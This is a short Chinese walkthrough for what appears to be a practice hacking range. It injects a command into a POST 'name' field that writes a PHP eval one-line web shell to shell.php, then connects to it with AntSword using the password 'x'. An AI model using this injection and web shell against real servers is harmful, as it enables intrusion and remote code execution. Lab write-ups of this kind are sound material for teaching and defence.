靶场地址：http://whalwl.xyz:8033/

解题准备：BP抓包，了解linux基本解压命令

解题思路：

1、BP抓包，替换POST中name的值

backup.tar.gz;echo '<?php @eval($_POST["x"]); ?>' >shell.php

 2、成功上传

 3、使用蚁剑连接        http://whalwl.xyz:8033/shell.php 密码为 x